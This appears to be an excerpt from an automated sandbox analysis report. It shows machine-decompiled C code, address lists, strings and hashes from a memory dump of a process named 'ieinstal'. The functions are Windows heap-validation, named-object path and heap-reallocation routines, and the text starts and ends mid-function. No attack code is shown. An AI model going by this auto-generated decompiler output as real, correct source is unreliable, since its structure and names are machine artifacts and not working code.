											}
											_t345 =  *_t345;
											__eflags = _t401 + 0xc0 - _t345;
											if(_t401 + 0xc0 != _t345) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t327 = E1EFBF5C7(_t401, _t402);
								__eflags = _t327;
								if(_t327 != 0) {
									goto L39;
								}
								_t345 = _t401;
								E1EFBF113(_t345, _t402,  *_t402 & 0x0000ffff, 1);
								goto L86;
							}
							_t379 =  *_t402 & 0x0000ffff;
							while(1) {
								__eflags = _t379 -  *((intOrPtr*)(_t389 + 4));
								if(_t379 <  *((intOrPtr*)(_t389 + 4))) {
									break;
								}
								_t330 =  *_t389;
								__eflags = _t330;
								if(_t330 == 0) {
									_t332 =  *((intOrPtr*)(_t389 + 4)) - 1;
									L34:
									_t66 = _t402 + 8; // -16
									E1EFD036A(_t401, _t389, 1, _t66, _t332, _t379);
									_t374 = _v24;
									goto L35;
								}
								_t389 = _t330;
							}
							_t332 = _t379;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t402 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E1F06D62C(_t401, _t402) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t384 & 0x00000002) == 0) {
							_t336 =  *(_t402 + 3) & 0x000000ff;
						} else {
							_t338 = E1EFF3AE9(_t402);
							_t354 = _v20;
							_t336 =  *(_t338 + 2) & 0x0000ffff;
						}
						_t416 = _t336;
						if(_t416 == 0) {
							goto L18;
						}
						if(_t416 >= 0) {
							__eflags = _t336 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t336 -  *((intOrPtr*)(_t401 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t399 = _a20;
							_t337 = _t336 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t399 + _t337 * 4)) =  *((intOrPtr*)(_t399 + _t337 * 4)) + _t354;
							goto L18;
						}
						_t337 = _t336 & 0x00007fff;
						if(_t337 >= 0x81) {
							goto L18;
						}
						_t399 = _a24;
						goto L17;
					}
					L86:
				} while (_t402 <  *((intOrPtr*)(_t344 + 0x28)));
				_t194 = _v12;
				goto L88;
			}

0x1f070e6d
0x1f070e75
0x1f070e79
0x1f070e7b
0x1f070e7f
0x1f070e81
0x1f070e86
0x1f070e88
0x1f070e8d
0x1f071221
0x1f071221
0x1f071227
0x1f071434
0x1f071437
0x1f071357
0x00000000
0x1f071357
0x1f07143d
0x1f071443
0x1f071447
0x1f071466
0x1f07146b
0x1f071449
0x1f07145e
0x1f071463
0x1f071471
0x1f071474
0x1f071477
0x1f071478
0x1f07142a
0x1f07142a
0x1f07140e
0x00000000
0x1f07140e
0x1f071237
0x1f071415
0x1f07141a
0x1f07123d
0x1f071252
0x1f071257
0x1f071420
0x1f071421
0x1f071424
0x1f071425
0x00000000
0x00000000
0x00000000
0x00000000
0x1f070e93
0x1f070e93
0x1f070e9a
0x1f070e9c
0x1f070ea1
0x1f070eab
0x1f070eae
0x1f070eb0
0x1f070eb5
0x1f070eb5
0x1f070eae
0x1f070ec6
0x1f0713a4
0x1f0713aa
0x1f0713ae
0x1f0713cd
0x1f0713d2
0x1f0713b0
0x1f0713c5
0x1f0713ca
0x1f0713e2
0x1f0713e7
0x1f0713e7
0x1f0713e9
0x1f0713f0
0x1f0713f8
0x1f0713f8
0x1f0713fc
0x1f071406
0x1f07140c
0x1f07140c
0x1f07140c
0x00000000
0x1f0713fc
0x1f070ecc
0x1f070ecf
0x1f070ed2
0x1f070ed7
0x1f070eda
0x1f070edd
0x1f070ee3
0x1f070f58
0x1f070f64
0x1f070f66
0x1f070f69
0x1f071139
0x1f07113c
0x1f07113f
0x1f071144
0x1f071144
0x1f071146
0x1f071146
0x1f07114b
0x1f071165
0x1f07114d
0x1f07115d
0x1f07115d
0x1f071169
0x1f071360
0x1f071366
0x1f07136a
0x1f071389
0x1f07138e
0x1f07136c
0x1f071381
0x1f071386
0x1f071398
0x1f071399
0x1f07139a
0x00000000
0x1f07116f
0x1f071173
0x1f0711fc
0x1f071200
0x1f07120a
0x1f071210
0x1f071210
0x1f071210
0x1f071212
0x1f071212
0x00000000
0x1f071212
0x1f071179
0x1f07117e
0x1f0712f4
0x1f0712fa
0x1f0712fd
0x1f071341
0x1f071345
0x1f07134f
0x1f071355
0x1f071355
0x1f071355
0x00000000
0x1f071345
0x1f0712ff
0x1f071305
0x1f071309
0x1f071328
0x1f07132d
0x1f07130b
0x1f071320
0x1f071325
0x1f071333
0x1f071336
0x1f071337
0x1f0712a0
0x1f0712a0
0x00000000
0x1f0712a5
0x1f071184
0x1f07118a
0x1f071191
0x1f07119b
0x1f0711a1
0x1f0711a1
0x1f0711a9
0x1f0711ae
0x1f0711f6
0x1f0711f6
0x00000000
0x1f0711b0
0x1f0711b4
0x1f0711b9
0x1f0711c3
0x1f0711c6
0x1f0711c8
0x1f0711cb
0x1f0711cd
0x1f0711cd
0x1f0711c6
0x1f0711da
0x1f0712ad
0x1f0712b3
0x1f0712b7
0x1f0712d6
0x1f0712db
0x1f0712b9
0x1f0712ce
0x1f0712d3
0x1f0712eb
0x1f0712ec
0x1f0712ed
0x00000000
0x1f0711e0
0x1f0711e4
0x1f0711ee
0x1f0711f4
0x1f0711f4
0x00000000
0x1f0711e4
0x1f0711da
0x1f0711ae
0x1f071169
0x1f070f72
0x1f070f75
0x1f070f78
0x1f070f7b
0x1f070f7d
0x1f070f80
0x1f070f82
0x1f070f82
0x1f070f85
0x1f070f85
0x1f070f80
0x1f070f88
0x1f070f8b
0x1f071124
0x1f071128
0x1f07112d
0x1f071130
0x1f071133
0x1f07125d
0x1f071263
0x1f071267
0x1f071286
0x1f07128b
0x1f071269
0x1f07127e
0x1f071283
0x1f071297
0x1f071297
0x1f071299
0x1f07129a
0x1f07129b
0x00000000
0x1f07129b
0x00000000
0x1f070f91
0x1f070f91
0x1f070f94
0x1f070f97
0x1f070f9a
0x1f070f9d
0x1f070fa0
0x1f070fa2
0x1f071106
0x1f071106
0x1f071108
0x1f07110c
0x1f07110d
0x1f071113
0x1f071114
0x00000000
0x1f071114
0x1f070fa8
0x1f070fab
0x1f070fad
0x1f070fb0
0x00000000
0x00000000
0x1f070fb9
0x1f070fbc
0x1f070fc2
0x1f070fc4
0x1f070fec
0x1f070fec
0x1f070fef
0x1f070ff1
0x1f070ff4
0x1f070ff8
0x1f071021
0x1f071021
0x1f071024
0x1f07102c
0x1f07102f
0x1f071032
0x1f071035
0x1f07103b
0x1f071050
0x1f07103d
0x1f071046
0x1f071048
0x1f071048
0x1f071052
0x1f071054
0x1f071087
0x1f071087
0x1f07108a
0x1f07108c
0x1f07109d
0x1f07109f
0x1f0710a1
0x1f0710a3
0x1f0710a5
0x1f0710a8
0x1f0710a9
0x1f07108e
0x1f07108e
0x1f07108e
0x1f071091
0x1f071093
0x1f071096
0x1f071098
0x1f071098
0x1f0710b1
0x1f0710b4
0x1f0710ba
0x1f0710bc
0x1f0710e1
0x1f0710e1
0x1f0710e5
0x1f0710f3
0x1f0710f9
0x1f0710f9
0x00000000
0x1f0710be
0x1f0710be
0x1f0710cb
0x1f0710cb
0x1f0710ce
0x00000000
0x00000000
0x1f0710c3
0x1f0710c5
0x1f0710c7
0x1f071103
0x1f0710d2
0x1f0710d4
0x1f0710d7
0x1f0710dc
0x00000000
0x1f0710dc
0x1f0710c9
0x1f0710c9
0x1f0710d0
0x00000000
0x1f0710d0
0x1f071056
0x1f071056
0x1f071059
0x1f071059
0x1f07105b
0x1f07106f
0x1f07105d
0x1f07105d
0x1f071060
0x1f071063
0x1f071065
0x1f071067
0x1f071067
0x1f071067
0x1f07106a
0x1f07106a
0x1f071076
0x1f071079
0x00000000
0x00000000
0x1f07107b
0x1f071083
0x1f071085
0x00000000
0x00000000
0x00000000
0x1f071085
0x00000000
0x1f071059
0x1f071054
0x1f070ffe
0x1f071003
0x1f071005
0x00000000
0x00000000
0x1f07100f
0x1f071011
0x00000000
0x1f071011
0x1f070fc6
0x1f070fd3
0x1f070fd3
0x1f070fd6
0x00000000
0x00000000
0x1f070fcb
0x1f070fcd
0x1f070fcf
0x1f07101e
0x1f070fda
0x1f070fdc
0x1f070fe4
0x1f070fe9
0x00000000
0x1f070fe9
0x1f070fd1
0x1f070fd1
0x1f070fd8
0x00000000
0x1f070fd8
0x1f070f8b
0x1f070ee9
0x1f070f38
0x1f070f3c
0x00000000
0x00000000
0x1f070f4d
0x00000000
0x00000000
0x00000000
0x1f070eeb
0x1f070eee
0x1f070f00
0x1f070ef0
0x1f070ef2
0x1f070ef7
0x1f070efa
0x1f070efa
0x1f070f04
0x1f070f07
0x00000000
0x00000000
0x1f070f09
0x1f070f1f
0x1f070f24
0x00000000
0x00000000
0x1f070f26
0x1f070f2d
0x00000000
0x00000000
0x1f070f2f
0x1f070f32
0x1f070f35
0x1f070f35
0x00000000
0x1f070f35
0x1f070f0b
0x1f070f18
0x00000000
0x00000000
0x1f070f1a
0x00000000
0x1f070f1a
0x1f071215
0x1f071215
0x1f07121e
0x00000000

Strings

Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 1F071478
HEAP: , xrefs: 1F071286, 1F0712D6, 1F071328, 1F071389, 1F0713CD, 1F071415, 1F071466
Heap block at %p has corrupted PreviousSize (%lx), xrefs: 1F0712ED
Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 1F071425
HEAP[%wZ]: , xrefs: 1F07124D, 1F071279, 1F0712C9, 1F07131B, 1F07137C, 1F0713C0, 1F071459
Heap block at %p is not last block in segment (%p), xrefs: 1F071337
Free Heap block %p modified at %p after it was freed, xrefs: 1F07129B
Heap block at %p has incorrect segment offset (%x), xrefs: 1F07139A
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 1F0713EB

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: 792de6df5b4cee4fb47df3876856d1c7a465534021b67eac8c0109057e2d3ba9
Instruction ID: 187735f78d35c721252afdf93a2df38cd7c3b0a32cc6ef4b42f1f5fb8c3830e7
Opcode Fuzzy Hash: 792de6df5b4cee4fb47df3876856d1c7a465534021b67eac8c0109057e2d3ba9
Instruction Fuzzy Hash: 4212D234604686EFD715CF65C854BAAB7F2FF09310F048699E8C68B681EB35F881DB94

Uniqueness

Uniqueness Score: -1.00%

Function 1F058D0A Relevance: 10.4, Strings: 8, Instructions: 401
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E1F058D0A(intOrPtr __ecx, signed short __edx, signed int _a4, signed int* _a8) {
				signed int _v8;
				char _v532;
				char _v536;
				char _v1052;
				char _v1328;
				char _v1332;
				void* _v1404;
				char _v1484;
				char _v1492;
				char _v1496;
				signed short _v1500;
				signed short _v1504;
				char* _v1508;
				short _v1510;
				char _v1512;
				signed int _v1516;
				char _v1520;
				signed short _v1524;
				signed short _v1528;
				signed int _v1532;
				signed int _v1536;
				void* _v1540;
				char _v1544;
				intOrPtr _v1548;
				signed int _v1552;
				void* _v1556;
				char _v1557;
				char _v1569;
				void* __ebx;
				void* __edi;
				void* __esi;
				short _t123;
				short _t124;
				signed int _t125;
				signed int _t149;
				signed int _t150;
				char* _t175;
				char* _t177;
				signed int _t205;
				void* _t206;
				signed short _t207;
				signed int _t208;
				intOrPtr _t212;
				signed int _t216;
				signed int* _t219;
				void* _t220;
				signed int _t222;
				void* _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t230;
				signed int _t232;
				signed int _t234;

				_t215 = __edx;
				_t232 = (_t230 & 0xfffffff8) - 0x614;
				_v8 =  *0x1f0bb370 ^ _t232;
				_t219 = _a8;
				_t205 = 0;
				_v1548 = __ecx;
				_v1516 = _v1516 & 0;
				_t222 = __edx;
				E1F008F40( &_v1052, 0, 0x208);
				E1F008F40( &_v532, 0, 0x208);
				_t234 = _t232 + 0x18;
				_v1508 = "\\";
				_t123 = 2;
				_v1512 = _t123;
				_t124 = 4;
				_v1510 = _t124;
				if(_t219 == 0) {
					L73:
					_t125 = 0xc000000d;
					L74:
					_pop(_t220);
					_pop(_t223);
					_pop(_t206);
					return E1F004B50(_t125, _t206, _v8 ^ _t234, _t215, _t220, _t223);
				}
				_t212 = _v1548;
				if(_t212 == 0) {
					goto L73;
				}
				_t216 = _a4;
				_v1552 = _t216;
				_v1552 = _v1552 & 1;
				_v1536 = _t216;
				_v1536 = _v1536 & 0x00000002;
				_v1532 = _t216;
				_v1532 = _v1532 & 0x00000008;
				_a4 = _t216 & 0x00000004;
				_t215 = 0;
				 *_t219 = 0;
				_t219[1] = 0;
				_v1528 = 0;
				_v1524 = 0;
				_v1504 = 0;
				_v1500 = 0;
				_v1556 = 0;
				_v1557 = 1;
				_v1540 = 0;
				if(_t222 == 0) {
					_push( &_v1544);
					_push(4);
					_push( &_v1556);
					_push(0x1d);
					_push(_t212);
					_t224 = E1F002BC0();
					__eflags = _t224;
					if(_t224 < 0) {
						goto L66;
					}
					__eflags = _v1556;
					if(__eflags == 0) {
						goto L4;
					}
					_push( &_v1544);
					_push(0x48);
					_push( &_v1404);
					_push(0x1f);
					_push(_v1548);
					_t224 = E1F002BC0();
					__eflags = _t224;
					if(_t224 < 0) {
						goto L66;
					}
					_t205 = _v1404;
					__eflags = _t205;
					if(__eflags != 0) {
						goto L4;
					} else {
						_t224 = 0xc0000001;
						goto L66;
					}
				} else {
					_t205 = _t222;
					_v1556 = 1;
					L4:
					_push( &_v1544);
					_push(4);
					_push( &_v1540);
					_push(0x2a);
					_push(_v1548);
					_t224 = E1F002BC0();
					if(_t224 < 0) {
						L66:
						E1EFD3B90( &_v1504);
						if(_t224 < 0) {
							E1EFD3B90(_t219);
						}
						if(_v1557 != 0) {
							E1EFD3B90( &_v1528);
						}
						_t134 = _v1516;
						if(_v1516 != 0) {
							E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t134);
						}
						_t125 = _t224;
						goto L74;
					}
					if(_v1540 == 0) {
						L8:
						_push( &_v1544);
						_push(4);
						_push( &_v1520);
						_push(0xc);
						_push(_v1548);
						_t224 = E1F002BC0();
						if(_t224 < 0) {
							goto L66;
						}
						if(_v1556 == 0) {
							L13:
							_t207 = 0x104;
							L14:
							_push( &_v1544);
							_push(0x118);
							_push( &_v1332);
							_push(0x2c);
							_push(_v1548);
							_t224 = E1F002BC0();
							if(_t224 < 0) {
								goto L66;
							}
							_t225 = _v1556;
							if(_v1540 != 0 || _t225 != 0 || _v1520 != E1EFD3C40()) {
								_t149 = 0;
								__eflags = 0;
							} else {
								_t149 = 1;
							}
							if(_v1552 != 0) {
								__eflags = _a4;
								if(_a4 != 0) {
									_push(L"AppContainerNamedObjects");
									goto L40;
								}
								_t175 = L"\\AppContainerNamedObjects";
								__eflags = _t225;
								if(_t225 == 0) {
									_t175 = 0x1ef95dfc;
								}
								_push(_t175);
								_t150 = E1F05774F( &_v1052, _t207, L"Global\\Session\\%ld%s", _v1520);
								_t234 = _t234 + 0x14;
							} else {
								if(_t149 != 0) {
									_push(L"\\BaseNamedObjects");
									L40:
									_t215 = _t207;
									_t150 = E1F05771A( &_v1052, _t207);
									L41:
									_t224 = _t150;
									if(_t224 < 0) {
										goto L66;
									}
									_v1552 = _v1552 & 0x00000000;
									_t215 = 0x208;
									_t214 =  &_v1052;
									_t224 = E1F0576DA( &_v1052, 0x208,  &_v1552);
									if(_t224 < 0) {
										goto L66;
									}
									if(_v1540 == 0 || _v1536 != 0) {
										_t226 = _v1552;
									} else {
										_t226 = (_v1504 & 0x0000ffff) + 2 + _v1552;
									}
									if(_v1556 != 0) {
										_t226 = _t226 + (_v1528 & 0x0000ffff) + 2;
									}
									if(_v1328 != 0 && _v1532 == 0) {
										E1F005050(_t214,  &_v1492, _v1332);
										_t226 = _t226 + (_v1500 & 0x0000ffff) + 2;
									}
									_t227 = _t226 + 2;
									_t208 = E1EFD5D60(_t227);
									if(_t208 != 0) {
										E1F008F40(_t208, 0, _t227);
										 *_t219 =  *_t219 & 0x00000000;
										_t234 = _t234 + 0xc;
										_t219[0] = _t227;
										_t219[1] = _t208;
										_t224 = E1EFCFE40(_t214, _t219,  &_v1052);
										__eflags = _t224;
										if(_t224 < 0) {
											goto L66;
										}
										__eflags = _v1540;
										if(_v1540 == 0) {
											L59:
											__eflags = _v1556;
											if(_v1556 == 0) {
												L62:
												__eflags = _v1328;
												if(_v1328 != 0) {
													__eflags = _v1532;
													if(_v1532 == 0) {
														_t224 = E1EFE10D0(_t214, _t219,  &_v1512);
														__eflags = _t224;
														if(_t224 >= 0) {
															_t224 = E1EFE10D0(_t214, _t219,  &_v1492);
														}
													}
												}
												goto L66;
											}
											_t224 = E1EFE10D0(_t214, _t219,  &_v1512);
											__eflags = _t224;
											if(_t224 < 0) {
												goto L66;
											}
											_t224 = E1EFE10D0(_t214, _t219,  &_v1528);
											__eflags = _t224;
											if(_t224 < 0) {
												goto L66;
											}
											goto L62;
										}
										__eflags = _v1536;
										if(_v1536 != 0) {
											goto L59;
										}
										_t224 = E1EFE10D0(_t214, _t219,  &_v1512);
										__eflags = _t224;
										if(_t224 < 0) {
											goto L66;
										}
										_t224 = E1EFE10D0(_t214, _t219,  &_v1504);
										__eflags = _t224;
										if(_t224 < 0) {
											goto L66;
										}
										goto L59;
									} else {
										_t224 = 0xc000009a;
										goto L66;
									}
								}
								_t177 = L"AppContainerNamedObjects";
								if(_t225 == 0) {
									_t177 = L"BaseNamedObjects";
								}
								_push(_t177);
								_push(_v1520);
								_t150 = E1F05774F( &_v1052, _t207, L"%s\\%ld\\%s", L"\\Sessions");
								_t234 = _t234 + 0x18;
							}
							goto L41;
						}
						_t224 = E1F0564B0(_t212, _t205,  &_v1496);
						if(_t224 < 0) {
							goto L66;
						}
						_t245 = _v1496 - 2;
						if(_v1496 != 2) {
							_t224 = E1F056400(_t212, _t215, __eflags, _t205,  &_v1516);
							__eflags = _t224;
							if(__eflags < 0) {
								goto L66;
							}
							_t224 = E1EFE39C0(_t205, _t224, __eflags,  &_v1528, _v1516, 1);
							__eflags = _t224;
							if(_t224 < 0) {
								goto L66;
							}
							_push( *((intOrPtr*)(_t205 + 0x34)));
							_push( *((intOrPtr*)(_t205 + 0x30)));
							_push( *((intOrPtr*)(_t205 + 0x2c)));
							_push( *((intOrPtr*)(_t205 + 0x28)));
							_t207 = 0x104;
							_t224 = E1F05774F( &_v532, 0x104, L"%s\\%u-%u-%u-%u", _v1524);
							_t234 = _t234 + 0x20;
							__eflags = _t224;
							if(_t224 < 0) {
								goto L66;
							}
							E1EFD3B90( &_v1528);
							E1F005050(_t212,  &_v1532,  &_v536);
							_v1569 = 0;
							goto L14;
						}
						_t224 = E1EFE39C0(_t205, _t224, _t245,  &_v1528, _t205, 1);
						if(_t224 < 0) {
							goto L66;
						}
						goto L13;
					}
					_push( &_v1544);
					_push(0x4c);
					_push( &_v1484);
					_push(1);
					_push(_v1548);
					_t224 = E1F002BC0();
					_t240 = _t224;
					if(_t224 < 0) {
						goto L66;
					}
					_t224 = E1EFE39C0(_t205, _t224, _t240,  &_v1504, _v1484, 1);
					if(_t224 < 0) {
						goto L66;
					}
					goto L8;
				}
			}

0x1f058d0a
0x1f058d12
0x1f058d1f
0x1f058d29
0x1f058d33
0x1f058d35
0x1f058d39
0x1f058d3d
0x1f058d46
0x1f058d5c
0x1f058d61
0x1f058d64
0x1f058d6e
0x1f058d6f
0x1f058d76
0x1f058d77
0x1f058d7e
0x1f059217
0x1f059217
0x1f05921c
0x1f059223
0x1f059224
0x1f059225
0x1f059230
0x1f059230
0x1f058d84
0x1f058d8a
0x00000000
0x00000000
0x1f058d90
0x1f058d95
0x1f058d9a
0x1f058d9e
0x1f058da2
0x1f058da7
0x1f058dae
0x1f058db3
0x1f058db6
0x1f058db8
0x1f058dba
0x1f058dbd
0x1f058dc1
0x1f058dc5
0x1f058dc9
0x1f058dcd
0x1f058dd1
0x1f058dd5
0x1f058ddb
0x1f058f07
0x1f058f08
0x1f058f0e
0x1f058f0f
0x1f058f11
0x1f058f17
0x1f058f19
0x1f058f1b
0x00000000
0x00000000
0x1f058f21
0x1f058f25
0x00000000
0x00000000
0x1f058f2f
0x1f058f30
0x1f058f39
0x1f058f3a
0x1f058f3c
0x1f058f45
0x1f058f47
0x1f058f49
0x00000000
0x00000000
0x1f058f4f
0x1f058f56
0x1f058f58
0x00000000
0x1f058f5e
0x1f058f5e
0x00000000
0x1f058f5e
0x1f058de1
0x1f058de1
0x1f058de3
0x1f058de7
0x1f058deb
0x1f058dec
0x1f058df2
0x1f058df3
0x1f058df5
0x1f058dfe
0x1f058e02
0x1f0591d5
0x1f0591da
0x1f0591e1
0x1f0591e4
0x1f0591e4
0x1f0591ee
0x1f0591f5
0x1f0591f5
0x1f0591fa
0x1f059200
0x1f05920e
0x1f05920e
0x1f059213
0x00000000
0x1f059213
0x1f058e0d
0x1f058e4a
0x1f058e4e
0x1f058e4f
0x1f058e55
0x1f058e56
0x1f058e58
0x1f058e61
0x1f058e65
0x00000000
0x00000000
0x1f058e70
0x1f058ea9
0x1f058ea9
0x1f058eae
0x1f058eb2
0x1f058eb3
0x1f058ebf
0x1f058ec0
0x1f058ec2
0x1f058ecb
0x1f058ecf
0x00000000
0x00000000
0x1f058eda
0x1f058ede
0x1f058ff2
0x1f058ff2
0x1f058efb
0x1f058efd
0x1f058efd
0x1f058ff9
0x1f059036
0x1f05903a
0x1f059067
0x00000000
0x1f059067
0x1f05903c
0x1f059041
0x1f059043
0x1f059045
0x1f059045
0x1f05904a
0x1f05905d
0x1f059062
0x1f058ffb
0x1f058ffd
0x1f05902f
0x1f05906c
0x1f05906c
0x1f059075
0x1f05907a
0x1f05907a
0x1f05907e
0x00000000
0x00000000
0x1f059084
0x1f05908e
0x1f059093
0x1f05909f
0x1f0590a3
0x00000000
0x00000000
0x1f0590ae
0x1f0590c5
0x1f0590b7
0x1f0590bf
0x1f0590bf
0x1f0590ce
0x1f0590d8
0x1f0590d8
0x1f0590e2
0x1f0590f7
0x1f059104
0x1f059104
0x1f059106
0x1f05910f
0x1f059113
0x1f059123
0x1f059128
0x1f059132
0x1f059135
0x1f059139
0x1f059143
0x1f059145
0x1f059147
0x00000000
0x00000000
0x1f05914d
0x1f059152
0x1f05917d
0x1f05917d
0x1f059182
0x1f0591a6
0x1f0591a6
0x1f0591ae
0x1f0591b0
0x1f0591b5
0x1f0591c2
0x1f0591c4
0x1f0591c6
0x1f0591d3
0x1f0591d3
0x1f0591c6
0x1f0591b5
0x00000000
0x1f0591ae
0x1f05918f
0x1f059191
0x1f059193
0x00000000
0x00000000
0x1f0591a0
0x1f0591a2
0x1f0591a4
0x00000000
0x00000000
0x00000000
0x1f0591a4
0x1f059154
0x1f059159
0x00000000
0x00000000
0x1f059166
0x1f059168
0x1f05916a
0x00000000
0x00000000
0x1f059177
0x1f059179
0x1f05917b
0x00000000
0x00000000
0x00000000
0x1f059115
0x1f059115
0x00000000
0x1f059115
0x1f059113
0x1f058fff
0x1f059006
0x1f059008
0x1f059008
0x1f05900d
0x1f05900e
0x1f059025
0x1f05902a
0x1f05902a
0x00000000
0x1f058ff9
0x1f058e7d
0x1f058e81
0x00000000
0x00000000
0x1f058e87
0x1f058e8c
0x1f058f73
0x1f058f75
0x1f058f77
0x00000000
0x00000000
0x1f058f8d
0x1f058f8f
0x1f058f91
0x00000000
0x00000000
0x1f058f97
0x1f058fa1
0x1f058fa4
0x1f058fa7
0x1f058faa
0x1f058fbf
0x1f058fc1
0x1f058fc4
0x1f058fc6
0x00000000
0x00000000
0x1f058fd1
0x1f058fe3
0x1f058fe8
0x00000000
0x1f058fe8
0x1f058e9f
0x1f058ea3
0x00000000
0x00000000
0x00000000
0x1f058ea3
0x1f058e13
0x1f058e14
0x1f058e1a
0x1f058e1b
0x1f058e1d
0x1f058e26
0x1f058e28
0x1f058e2a
0x00000000
0x00000000
0x1f058e40
0x1f058e44
0x00000000
0x00000000
0x00000000
0x1f058e44

Strings

\AppContainerNamedObjects, xrefs: 1F05903C, 1F05904A
Global\Session\%ld%s, xrefs: 1F059056
AppContainerNamedObjects, xrefs: 1F058FFF, 1F059067
\BaseNamedObjects, xrefs: 1F05902F
BaseNamedObjects, xrefs: 1F059008, 1F05900D
%s\%ld\%s, xrefs: 1F05901E
%s\%u-%u-%u-%u, xrefs: 1F058FB3
\Sessions, xrefs: 1F059019

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
API String ID: 2994545307-3063724069
Opcode ID: 6f170593259c71012227ce43caee0b738a9d31280c8dfbd1c8f3816457a9bdfd
Instruction ID: 391f7f10cb3f18c102d4a5202845748bd056877b21410285010b08f1c6a3ed3c
Opcode Fuzzy Hash: 6f170593259c71012227ce43caee0b738a9d31280c8dfbd1c8f3816457a9bdfd
Instruction Fuzzy Hash: 61D1E372804365AFD721DB10C844BAFB7E8AF85714F040E29FE859B160E7B5ED44C792

Uniqueness

Uniqueness Score: -1.00%

Function 1F06FDF4 Relevance: 10.3, Strings: 8, Instructions: 348
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E1F06FDF4(void* __ebx, signed int* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t130;
				signed int _t132;
				intOrPtr _t138;
				intOrPtr _t139;
				signed int _t149;
				signed int _t150;
				intOrPtr _t151;
				signed int _t152;
				intOrPtr _t155;
				intOrPtr _t159;
				intOrPtr _t172;
				signed int _t173;
				signed int _t174;
				signed char _t177;
				signed int _t178;
				signed int _t183;
				void* _t184;
				signed char _t192;
				signed int _t193;
				intOrPtr _t195;
				intOrPtr _t199;
				signed int _t209;
				signed int _t226;
				signed char _t236;
				signed int* _t240;
				signed int* _t248;
				signed int _t253;
				signed int _t255;
				signed int _t267;
				signed int _t278;
				signed int* _t279;
				intOrPtr* _t283;
				void* _t284;
				void* _t286;

				_push(0x40);
				_push(0x1f09d430);
				E1F017BE4(__ebx, __edi, __esi);
				_t281 = __ecx;
				 *((intOrPtr*)(_t284 - 0x3c)) = __ecx;
				 *((char*)(_t284 - 0x19)) = 0;
				 *(_t284 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t284 - 4)) = 0;
					 *((intOrPtr*)(_t284 - 4)) = 1;
					_t130 = E1EFB7662("RtlReAllocateHeap");
					__eflags = _t130;
					if(_t130 == 0) {
						L72:
						 *(_t284 - 0x24) = 0;
						L73:
						 *((intOrPtr*)(_t284 - 4)) = 0;
						 *((intOrPtr*)(_t284 - 4)) = 0xfffffffe;
						E1F0702E6(_t281);
						_t132 =  *(_t284 - 0x24);
						goto L75;
					}
					_t236 =  *(__ecx + 0x44) | __edx;
					 *(_t284 - 0x30) = _t236;
					 *(_t284 - 0x34) = _t236 | 0x10000100;
					__eflags =  *(_t284 + 0xc);
					if( *(_t284 + 0xc) == 0) {
						_t267 = 1;
						__eflags = 1;
					} else {
						_t267 =  *(_t284 + 0xc);
					}
					_t138 = ( *((intOrPtr*)(_t281 + 0x94)) + _t267 &  *(_t281 + 0x98)) + 8;
					 *((intOrPtr*)(_t284 - 0x40)) = _t138;
					__eflags = _t138 -  *(_t284 + 0xc);
					if(_t138 <  *(_t284 + 0xc)) {
						L68:
						_t139 =  *[fs:0x30];
						__eflags =  *(_t139 + 0xc);
						if( *(_t139 + 0xc) == 0) {
							_push("HEAP: ");
							E1EFBB910();
						} else {
							E1EFBB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t281 + 0x78)));
						E1EFBB910("Invalid allocation size - %Ix (exceeded %Ix)\n",  *(_t284 + 0xc));
						goto L72;
					}
					__eflags = _t138 -  *((intOrPtr*)(_t281 + 0x78));
					if(_t138 >  *((intOrPtr*)(_t281 + 0x78))) {
						goto L68;
					}
					 *(_t284 - 0x20) = 0;
					__eflags = _t236 & 0x00000001;
					if((_t236 & 0x00000001) == 0) {
						E1EFCFED0( *((intOrPtr*)(_t281 + 0xc8)));
						 *((char*)(_t284 - 0x19)) = 1;
						_t226 =  *(_t284 - 0x30) | 0x10000101;
						__eflags = _t226;
